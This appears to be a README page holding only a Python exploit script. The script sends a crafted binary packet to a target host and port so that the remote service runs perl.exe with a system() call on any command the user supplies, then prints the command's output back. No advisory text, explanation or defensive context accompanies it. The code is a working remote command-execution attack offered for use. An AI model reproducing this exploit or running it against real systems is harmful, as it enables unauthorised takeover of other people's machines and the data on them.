README.md
Rendering markdown...
import socket
import struct
import sys
def usage():
print(f"Usage: {sys.argv[0]} <target> <port> <command>", file=sys.stderr)
exit(-1)
def exploit(host, port, command):
print(f"[*] Connecting to target '{host}:{port}'...", file=sys.stderr)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((host, int(port)))
except Exception as ex:
print(f"[!] Socket error: \n\t{ex}", file=sys.stderr)
exit(-3)
else:
print("[*] Connected to the target.", file=sys.stderr)
OFFSET = 46
command = command.replace("\\", "\\\\")
command_size = chr(OFFSET + len(command)).encode('latin-1')
CRAFTED_PKT = b"\x00\x00\x00" + \
command_size + \
b"\x32\x00\x01" + \
b"\x01\x01\x01" + \
b"\x01\x01\x00" + \
b"\x01\x00\x01" + \
b"\x00\x01\x00" + \
b"\x01\x01\x00" + \
b"\x2028\x00" + \
b"\\perl.exe" + \
b"\x00 -esystem('" + command.encode('latin-1') + b"')\x00"
print(f"[*] Sending payload '{command}'", file=sys.stderr)
sock.sendall(CRAFTED_PKT)
print("[*] Output:", file=sys.stderr)
while True:
response_size = sock.recv(4)
if not response_size:
break
n = struct.unpack(">I", response_size)[0]
response = sock.recv(n)
response = response[5:].strip()
response = response.replace(b"\n", b"")
response = response.replace(b"\x00", b"")
if b"*RETVAL*" in response.upper():
break
print(response.decode('latin-1'))
sock.close()
if __name__ == "__main__":
argc = len(sys.argv)
if argc < 4:
usage()
host = sys.argv[1]
port = sys.argv[2]
cmd = sys.argv[3]
if port.isdigit():
port = int(port)
else:
print("[!] Error, invalid port value", file=sys.stderr)
exit(-2)
exploit(host, port, cmd)
exit(0)